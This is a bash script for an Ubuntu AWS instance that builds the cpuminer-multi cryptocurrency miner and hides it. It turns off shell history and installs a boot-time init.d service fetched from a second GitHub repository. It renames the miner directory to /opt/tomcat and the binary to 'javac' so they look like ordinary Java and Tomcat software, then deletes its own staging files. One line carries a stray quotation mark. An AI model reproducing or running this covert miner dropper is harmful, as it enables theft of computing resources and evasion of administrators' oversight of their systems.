## Script optimized for AWS AMI Type = ami-f90db999 Ubuntu 14.04 LTS
## Stage 1 ##
#!/bin/bash
HISTSIZE=0
echo "apt-get update && apt-get -y install libcurl4-openssl-dev libncurses5-dev pkg-config automake yasm libssl-dev git gcc make" > /root/1;
echo "cd /opt && git clone https://github.com/wolf9466/cpuminer-multi.git" >> 1;
echo "cd cpuminer-multi" >> /root/1;
echo "./autogen.sh" >> /root/1;
echo "./configure" >> /root/1;
echo "make" >> /root/1;
chmod 777 /root/1 && /root/1;
for x in `seq 1 1 5`; do sleep 1; echo "${x} - OneDone - Wait a bit.. ${x}/5"; done";
echo "Fuck";
sleep 1;
clear;
echo "rm -f /root/1" > /root/2;
echo "cd /root/" >> /root/2;
echo "git clone https://github.com/stryng/bash-stuff.git" >> /root/2;
echo "cp /root/bash-stuff/1 /etc/init.d/1" >> /root/2;
echo "chmod 777 /etc/init.d/1" >> /root/2;
echo "update-rc.d 1 defaults" >> /root/2;
echo "rm -rf /root/bash-stuff" >> /root/2;
echo "mv /opt/cpuminer-multi/ /opt/tomcat" >> /root/2;
echo "mv /opt/tomcat/minerd /opt/tomcat/javac" >> /root/2;
echo "service 1 restart || /etc/init.d/1 start" >> /root/2;
chmod 777 /root/2 && /root/2;
rm -f /root/1 && rm -f /root/2;
